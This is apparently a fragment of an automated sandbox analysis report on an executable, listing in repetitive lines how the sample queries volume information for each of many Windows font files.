                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
